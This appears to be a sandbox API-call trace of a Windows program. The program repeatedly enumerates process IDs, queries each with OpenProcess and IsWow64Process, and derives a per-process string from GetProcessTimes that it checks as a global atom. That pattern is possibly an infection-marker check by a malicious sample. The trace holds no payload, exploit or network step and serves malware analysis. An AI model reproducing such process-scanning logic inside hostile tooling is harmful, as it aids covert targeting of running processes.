	[0089.752] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.752] CloseHandle (hObject=0x20c) returned 1
	[0089.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.752] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.752] CloseHandle (hObject=0x20c) returned 1
	[0089.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.752] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.752] CloseHandle (hObject=0x20c) returned 1
	[0089.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.752] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.752] CloseHandle (hObject=0x20c) returned 1
	[0089.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.752] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.752] CloseHandle (hObject=0x20c) returned 1
	[0089.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.752] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.752] CloseHandle (hObject=0x20c) returned 1
	[0089.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.753] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.753] CloseHandle (hObject=0x20c) returned 1
	[0089.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.753] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.753] CloseHandle (hObject=0x20c) returned 1
	[0089.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.753] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.753] CloseHandle (hObject=0x20c) returned 1
	[0089.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.753] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.753] CloseHandle (hObject=0x20c) returned 1
	[0089.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.753] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.753] CloseHandle (hObject=0x20c) returned 1
	[0089.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.753] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.753] CloseHandle (hObject=0x20c) returned 1
	[0089.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.754] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.754] CloseHandle (hObject=0x20c) returned 1
	[0089.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.754] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.754] CloseHandle (hObject=0x20c) returned 1
	[0089.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.754] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.754] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0089.754] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0089.754] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0089.755] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.755] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0089.755] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.755] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0089.755] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0089.755] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0089.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0089.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0089.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0089.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0089.756] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.756] CloseHandle (hObject=0x20c) returned 1
	[0089.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0089.756] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.756] CloseHandle (hObject=0x20c) returned 1
	[0089.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0089.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.827] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.827] CloseHandle (hObject=0x20c) returned 1
	[0089.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.828] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.828] CloseHandle (hObject=0x20c) returned 1
	[0089.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.828] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.828] CloseHandle (hObject=0x20c) returned 1
	[0089.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.828] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.828] CloseHandle (hObject=0x20c) returned 1
	[0089.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.828] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.828] CloseHandle (hObject=0x20c) returned 1
	[0089.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.829] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.829] CloseHandle (hObject=0x20c) returned 1
	[0089.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.829] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.829] CloseHandle (hObject=0x20c) returned 1
	[0089.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.829] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.829] CloseHandle (hObject=0x20c) returned 1
	[0089.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.829] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.829] CloseHandle (hObject=0x20c) returned 1
	[0089.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.829] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.829] CloseHandle (hObject=0x20c) returned 1
	[0089.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.830] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.830] CloseHandle (hObject=0x20c) returned 1
	[0089.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.830] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.830] CloseHandle (hObject=0x20c) returned 1
	[0089.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.830] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.830] CloseHandle (hObject=0x20c) returned 1
	[0089.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.830] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.830] CloseHandle (hObject=0x20c) returned 1
	[0089.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.831] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.831] CloseHandle (hObject=0x20c) returned 1
	[0089.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.831] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.831] CloseHandle (hObject=0x20c) returned 1
	[0089.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.831] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.831] CloseHandle (hObject=0x20c) returned 1
	[0089.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0089.831] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.831] CloseHandle (hObject=0x20c) returned 1
	[0089.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.831] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.831] CloseHandle (hObject=0x20c) returned 1
	[0089.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.832] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.832] CloseHandle (hObject=0x20c) returned 1
	[0089.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.832] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.832] CloseHandle (hObject=0x20c) returned 1
	[0089.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.832] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.832] CloseHandle (hObject=0x20c) returned 1
	[0089.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.832] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.832] CloseHandle (hObject=0x20c) returned 1
	[0089.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.832] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.832] CloseHandle (hObject=0x20c) returned 1
	[0089.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.832] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.833] CloseHandle (hObject=0x20c) returned 1
	[0089.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.833] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.833] CloseHandle (hObject=0x20c) returned 1
	[0089.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.833] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.833] CloseHandle (hObject=0x20c) returned 1
	[0089.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.833] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.833] CloseHandle (hObject=0x20c) returned 1
	[0089.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.833] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.833] CloseHandle (hObject=0x20c) returned 1
	[0089.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.833] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.833] CloseHandle (hObject=0x20c) returned 1
	[0089.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.834] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.834] CloseHandle (hObject=0x20c) returned 1
	[0089.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.834] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.834] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0089.834] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0089.834] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0089.834] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.835] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0089.835] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.835] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0089.835] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0089.835] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0089.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0089.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0089.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0089.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0089.835] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.836] CloseHandle (hObject=0x20c) returned 1
	[0089.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0089.836] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.836] CloseHandle (hObject=0x20c) returned 1
	[0089.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.905] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0089.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.906] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.906] CloseHandle (hObject=0x20c) returned 1
	[0089.906] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.907] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.907] CloseHandle (hObject=0x20c) returned 1
	[0089.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.907] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.907] CloseHandle (hObject=0x20c) returned 1
	[0089.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.907] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.907] CloseHandle (hObject=0x20c) returned 1
	[0089.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.907] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.907] CloseHandle (hObject=0x20c) returned 1
	[0089.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.908] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.908] CloseHandle (hObject=0x20c) returned 1
	[0089.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.908] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.908] CloseHandle (hObject=0x20c) returned 1
	[0089.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.908] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.908] CloseHandle (hObject=0x20c) returned 1
	[0089.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.908] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.908] CloseHandle (hObject=0x20c) returned 1
	[0089.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.908] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.908] CloseHandle (hObject=0x20c) returned 1
	[0089.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.909] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.909] CloseHandle (hObject=0x20c) returned 1
	[0089.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.909] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.909] CloseHandle (hObject=0x20c) returned 1
	[0089.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.909] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.909] CloseHandle (hObject=0x20c) returned 1
	[0089.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.909] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.909] CloseHandle (hObject=0x20c) returned 1
	[0089.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.909] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.909] CloseHandle (hObject=0x20c) returned 1
	[0089.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.909] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.909] CloseHandle (hObject=0x20c) returned 1
	[0089.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.910] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.910] CloseHandle (hObject=0x20c) returned 1
	[0089.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0089.910] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.910] CloseHandle (hObject=0x20c) returned 1
	[0089.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.910] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.910] CloseHandle (hObject=0x20c) returned 1
	[0089.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.910] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.910] CloseHandle (hObject=0x20c) returned 1
	[0089.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.910] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.910] CloseHandle (hObject=0x20c) returned 1
	[0089.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.911] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.911] CloseHandle (hObject=0x20c) returned 1
	[0089.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.911] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.911] CloseHandle (hObject=0x20c) returned 1
	[0089.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.911] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.911] CloseHandle (hObject=0x20c) returned 1
